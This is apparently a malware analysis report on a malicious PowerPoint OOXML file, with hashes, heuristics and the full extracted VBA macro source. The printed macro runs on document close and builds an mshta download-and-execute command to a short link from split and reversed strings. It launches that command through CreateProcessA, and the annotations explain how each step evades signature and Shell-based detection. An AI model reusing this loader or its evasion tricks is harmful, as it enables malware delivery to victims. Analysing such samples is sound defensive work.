Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 69cbb88e679b72ea…

MALICIOUS

Office (OOXML)

14.1 KB First seen: 2021-06-20
MD5: 90d1650e5bfe5f3ef41b072961cb6a84 SHA-1: 201aa5d1ce0407bd5a98feec3f57e7ef659da468 SHA-256: 69cbb88e679b72eaec2dd5fb1f4ac70c976ca1ff2c0423b366b1afb38f14325b
68 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The OOXML file contains a VBA project whose Auto_Close macro launches a child process through a directly declared CreateProcessA call. The macro assembles its command line by concatenating and reversing string fragments so that neither the executable name nor the URL appears contiguously in the source, then hands the result to mshta to download and execute a payload. The script attempts to fetch content from 'http://bitly.com/asdhjwqdoqiwodma' and run it.

Heuristics 3

  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/phosa.bin)
  • VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Attribute VB_Name = "Module2"
    Sub auto_close()

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3205 bytes
SHA-256: 86c92b73efc1de885bf919e950ef6cd75c48da822f2fe6803f66393f5f2c0873
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module2"
' Module2: execution entry point of the extracted project.
' Auto_Close runs automatically when the document is closed, so once macros
' are enabled no further user action is required to start the chain.
Sub auto_close()


' Class1 assembles the command line; Class2 launches it
' (see the Class1.ss and Class2.MobileCall listings below).
Dim obj As New Class1
Dim obj2 As New Class2

' getName() calls ss(1), which stores the assembled command line in obj.n_name.
obj.getName

' MobileCall passes that string straight to CreateProcessA.
obj2.MobileCall obj.n_name


End Sub




Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Class1: command-line builder. Its only job is to produce the string that
' Class2.MobileCall executes, while keeping the executable name and the URL
' out of any single string literal.
' Holds the assembled command line; written by ss(), read by Module2.auto_close.
Public n_name As String

' Returns the single character "m". ss() prepends it to "shta " to form
' "mshta ", so the literal "mshta" never appears contiguously in the source;
' static rules that look for that token as one string will not match this macro.
Public Function P_public() As String
P_public = "m"
End Function




' Selects one of several strings by MyVar and stores it in n_name.
' Only Case 1 is ever reached (getName() always passes 1); Cases 2 and 3 are
' decoy strings and Case Else merely shows a message box.
' No explicit return value is assigned, so the function's own result is Empty;
' the useful output is the side effect on n_name.
Private Function ss(MyVar As Integer)
   Dim obj As Class2

  Dim b_public As String
   Select Case MyVar
      Case 1
         ' StrReverse(".www//:ptth") yields "http://www.", so the assembled
         ' value is: mshta http://www.bitly.com/asdhjwqdoqiwodma
         ' (appears to be a short link; the final payload host is not resolved
         ' in this report).
         b_public = P_public + "shta " + StrReverse(".www//:ptth") + "bitly.com/asdhjwqdoqiwodma"
        
      Case 2
         b_public = "Get Value From Prime Numbers"
      Case 3
         b_public = "Get No Value as number"
      Case Else
         MsgBox "Unknown Number"
   End Select
   n_name = b_public
End Function




' Wrapper that triggers ss(1); the assembled command line is then available
' to the caller through the public n_name member.
Public Function getName()
getName = ss(1)



End Function

Attribute VB_Name = "Class2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Class2: process launcher. It calls the Win32 CreateProcessA API through
' Declare statements instead of VBA's Shell(), so detection logic that only
' looks for Shell / WScript.Shell usage in macro text will not see this launch.
Option Explicit
' Win32 STARTUPINFO mirrored as a VBA user-defined type; only cb is set below.
Private Type STARTUPINFO
cb As Long
lpReserved As String
lpDesktop As String
lpTitle As String
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type

' Win32 PROCESS_INFORMATION; receives the new process and thread handles.
Private Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessID As Long
dwThreadID As Long
End Type

' Used below to poll the child process with a 0 ms timeout.
Private Declare Function WaitForSingleObject Lib "kernel32" (ByVal _
hHandle As Long, ByVal dwMilliseconds As Long) As Long

' Direct process creation. These declarations lack PtrSafe and use Long for
' handles, so the module only compiles under 32-bit Office; the sample is
' presumably aimed at 32-bit installs.
Private Declare Function CreateProcessA Lib "kernel32" (ByVal _
lpApplicationName As Long, ByVal lpCommandLine As String, ByVal _
lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, _
ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, _
ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, _
lpStartupInfo As STARTUPINFO, lpProcessInformation As _
PROCESS_INFORMATION) As Long

Private Declare Function CloseHandle Lib "kernel32" (ByVal _
hObject As Long) As Long

Private Const NORMAL_PRIORITY_CLASS = &H20&
' Declared but never used: the wait loop below passes a 0 ms timeout instead.
Private Const INFINITE = -1&



' Launches cmdline (the string built in Class1.n_name) as a child of the
' Office host process. From a detection standpoint this is the observable
' event: an Office application spawning mshta with a remote URL on its
' command line.
Public Sub MobileCall(cmdline As String)
Dim proc As PROCESS_INFORMATION
Dim start As STARTUPINFO
' Integer although every API declared above returns Long; a large return
' value (e.g. a WAIT_FAILED result) would raise an overflow error here.
Dim ReturnValue As Integer

' Initialize the STARTUPINFO structure:
start.cb = Len(start)

' Start the shelled application:
' lpApplicationName is 0, so the executable is resolved from the command line
' itself; bInheritHandles = 1 passes the host's inheritable handles to the child.
ReturnValue = CreateProcessA(0&, cmdline$, 0&, 0&, 1&, _
NORMAL_PRIORITY_CLASS, 0&, 0&, start, proc)

' Wait for the shelled application to finish:
' 258 is WAIT_TIMEOUT; DoEvents keeps the Office UI responsive while polling.
Do
ReturnValue = WaitForSingleObject(proc.hProcess, 0)
DoEvents
Loop Until ReturnValue <> 258

' Only hProcess is closed; proc.hThread is never released.
ReturnValue = CloseHandle(proc.hProcess)
End Sub
vbaProject_00.bin vba-project OOXML VBA project: ppt/phosa.bin 31744 bytes
SHA-256: 6493657b3db39e5f2c2c23ba1edc52b8e48e6ba13e1796220eceaac8e5741b7a